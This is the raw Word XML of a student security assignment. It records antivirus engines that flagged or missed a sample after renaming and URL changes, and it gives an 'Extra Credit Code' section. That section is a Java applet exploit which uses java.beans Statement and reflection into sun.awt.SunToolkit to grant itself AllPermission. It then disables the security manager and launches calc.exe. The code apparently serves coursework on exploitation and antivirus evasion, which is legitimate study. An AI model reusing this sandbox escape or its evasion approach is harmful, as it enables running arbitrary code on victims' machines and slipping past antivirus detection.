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F6040" w14:textId="1A102DEE" w:rsidR="00086095" w:rsidRDefault="004835A6">
      <w:r>
        <w:t>Michael Young (myoung10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BECF83" w14:textId="0CE01F0B" w:rsidR="004835A6" w:rsidRDefault="004835A6">
      <w:r>
        <w:t>Assignment 5-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D139342" w14:textId="43050F89" w:rsidR="008948F0" w:rsidRDefault="008948F0"/>
    <w:p w14:paraId="3431DC54" w14:textId="26AFCECA" w:rsidR="008948F0" w:rsidRDefault="008948F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008948F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bypasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419CDAC6" w14:textId="347B0801" w:rsidR="008948F0" w:rsidRPr="008948F0" w:rsidRDefault="008948F0">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note, it appears that some where bypassed, while new ones were flagged. To save the labor of cross comparing all of these, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>I’m</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> only listing a few. All can be derived from the below screen shots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30768660" w14:textId="438EEE51" w:rsidR="008948F0" w:rsidRDefault="008948F0">
      <w:r w:rsidRPr="008948F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008948F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="008948F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Change</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: F-secure, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Jiangmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A0EEA">
        <w:t>, …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C36A9" w14:textId="3BB2AC7C" w:rsidR="004835A6" w:rsidRDefault="008948F0">
      <w:r w:rsidRPr="008948F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008948F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidRPr="008948F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Change</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Jiangmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, K7GW, nProtect</w:t>
      </w:r>
      <w:r w:rsidR="008A0EEA">
        <w:t>, …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734860E" w14:textId="77777777" w:rsidR="008948F0" w:rsidRDefault="008948F0"/>
    <w:p w14:paraId="42820DF4" w14:textId="281C99A2" w:rsidR="004835A6" w:rsidRDefault="004835A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004835A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Before Modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3EAB6C" w14:textId="4ECD178A" w:rsidR="004835A6" w:rsidRDefault="004835A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D0CF0AF" wp14:editId="0B1CE102">
            <wp:extent cx="4703233" cy="41575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8450" cy="41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9CD" w14:textId="3538AB53" w:rsidR="004835A6" w:rsidRDefault="004835A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A115E6D" w14:textId="4D5376CD" w:rsidR="004835A6" w:rsidRDefault="004835A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>After Name Change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16016B38" w14:textId="23C2C21D" w:rsidR="004835A6" w:rsidRDefault="004835A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9DA722" wp14:editId="5027015A">
            <wp:extent cx="5943600" cy="4728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AB1F" w14:textId="00BAF012" w:rsidR="004835A6" w:rsidRDefault="004835A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>After URL change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E988742" w14:textId="1840306C" w:rsidR="004835A6" w:rsidRDefault="004835A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8E6D9C" wp14:editId="05C6D881">
            <wp:extent cx="5943600" cy="4879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D90F" w14:textId="0C280261" w:rsidR="004835A6" w:rsidRDefault="004835A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extra Credit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F008B2" w14:textId="0A8F3BBB" w:rsidR="004835A6" w:rsidRDefault="004835A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F33586" wp14:editId="00ADC500">
            <wp:extent cx="5943600" cy="4567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A378" w14:textId="256B36D7" w:rsidR="004835A6" w:rsidRDefault="004835A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extra Credit Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F00E2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java.applet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.Applet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4421DAEF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java.awt.Graphics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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61D8CDFA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java.beans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.Expression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5562D0C7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java.beans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.Statement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4AF03DC8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java.lang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.reflect.Field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7D7EF32D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java.net.MalformedURLException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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0A43F72B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import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java.net.URL;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C6DDCCC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java.security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC7672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java.security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.cert.Certificate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5218C276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AE91AE9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@SuppressWarnings("deprecation")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA21A6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public class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SomethingNew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extends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Applet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2EA9E8AC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</w:p>
    <w:p w14:paraId="474FE2A1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EB613A7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public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SomethingNew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0A1CCD5B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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFECDD0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032A6F6B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E0120F5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private Class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GetClass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String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paramString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5C5A1C9D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throws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Throwable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="08089A11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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0B2849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Object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arrayOfObject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] = new Object[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40155582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arrayOfObject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0] =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paramString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0D7E1FAA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Expression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localExpression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new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Expression(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Class.class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, "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forName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",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arrayOfObject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14:paraId="3A91828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localExpression.execute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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7B48DFE9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return (Class)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localExpression.getValue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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="35C2E54E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10E3BE53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0C093997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public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ProtectionDomain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blahFunc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ProtectionDomain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orangeYellow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, Permissions fun) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F31B9D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CodeSource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happy;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01773400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>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55128EEF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happy = new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CodeSource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new URL("https://"), new Certificate[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440243BD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return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orangeYellow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new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ProtectionDomain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happy, fun);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ED7198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>} catch (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MalformedURLException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e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B9615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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20297082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return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null;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70CDECA3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26FC1902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0583BDE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private void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SetField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Class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paramClass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String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paramString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, Object paramObject1, Object paramObject2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD7AD5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throws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Throwable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E5E0648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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2823EE3F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Object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arrayOfObject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] = new Object[2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0577A48E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arrayOfObject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0] =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paramClass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59F0A1DE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arrayOfObject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1] =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paramString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</w:p>
    <w:p w14:paraId="7F7EAA05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Expression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localExpression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new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Expression(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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GetClass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("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sun.awt.SunToolkit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"), "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getField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",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arrayOfObject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14:paraId="394D82FE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localExpression.execute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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6DA729CE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((Field)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localExpression.getValue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()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).set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(paramObject1, paramObject2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FBB461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1343C07D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293C2752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public void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goAround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Statement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asdf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AccessControlContext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iPhone) throws Throwable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BD393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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D482D27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SetField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Statement.class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"acc",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asdf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, iPhone);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F8D98E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asdf.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="79BEF2C0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2D73AB9C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98B3CE3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public void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init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7DABB9A9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFE897F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try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDA5C7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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FD9891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enhanceStuff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14:paraId="48D29AE9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Process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localProcess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null;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="528DCB3D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localProcess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Runtime.getRuntime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).exec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("calc.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BAC0E6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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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localProcess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!= null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86F3F3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localProcess.waitFor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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7349742F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB372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catch(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Throwable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localThrowable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377F5AE3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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE852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localThrowable.printStackTrace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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2CD68547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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC3CE68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3ED24EE9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52A2666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public void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paint(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Graphics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paramGraphics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5D0FE428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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0A8D9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paramGraphics.drawString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("Loading", 50, 25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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="254A704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33C1959B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249517ED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public void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enhanceStuff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06C3B6EB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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D045B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valr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"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setSecurityManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2EACC64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</w:p>
    <w:p w14:paraId="353EE2D0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Permissions fun = new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Permissions(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</w:p>
    <w:p w14:paraId="489023AC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</w:p>
    <w:p w14:paraId="5CB55CB8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</w:p>
    <w:p w14:paraId="34B2D38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</w:p>
    <w:p w14:paraId="4B692C2B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fun.add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new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AllPermission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());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD056D3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</w:p>
    <w:p w14:paraId="7F9F9106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</w:p>
    <w:p w14:paraId="278B921C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ProtectionDomain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orangeYellow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null;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30710AA0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</w:p>
    <w:p w14:paraId="7BB1566A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orangeYellow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blahFunc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orangeYellow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, fun);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D2CD9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14:paraId="74BE62E9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</w:p>
    <w:p w14:paraId="46E57BEE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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD039E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Statement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asdf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new </w:t>
      </w:r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Statement(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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System.class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valr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, new Object[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49D74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goAround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asdf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jjdfgj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kkakkka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orangeYellow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)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD413DC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} catch (Throwable r) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250AB5B1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26E907D1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DD9F76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public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AccessControlContext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jjdfgj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ProtectionDomain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[]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pDiddy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</w:p>
    <w:p w14:paraId="553B5718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return new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AccessControlContext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pDiddy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60891CC4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07217E5F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</w:p>
    <w:p w14:paraId="2AF9BCF5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public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ProtectionDomain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kkakkka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ProtectionDomain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orangeYellow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</w:p>
    <w:p w14:paraId="49D2D08E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return new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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ProtectionDomain</w:t>
      </w:r>
      <w:proofErr w:type="spell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gramEnd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] {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3797B15A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            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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orangeYellow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="517B9466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        };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8EA92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44B8A87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210E2C52" w14:textId="77777777" w:rsidR="004835A6" w:rsidRPr="004835A6" w:rsidRDefault="004835A6" w:rsidP="004835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835A6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1D23A588" w14:textId="77777777" w:rsidR="004835A6" w:rsidRPr="004835A6" w:rsidRDefault="004835A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004835A6" w:rsidRPr="00483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A6"/>
    <w:rsid w:val="00086095"/>
    <w:rsid w:val="00343827"/>
    <w:rsid w:val="004835A6"/>
    <w:rsid w:val="008948F0"/>
    <w:rsid w:val="008A0EEA"/>
    <w:rsid w:val="009430F6"/>
    <w:rsid w:val="00BE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54FBC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0899C14E-6D03-4FBF-A46D-3442B3972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3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35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3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511</Words>
  <Characters>2914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Young</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Michael Young</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-11T21:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-11T21:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>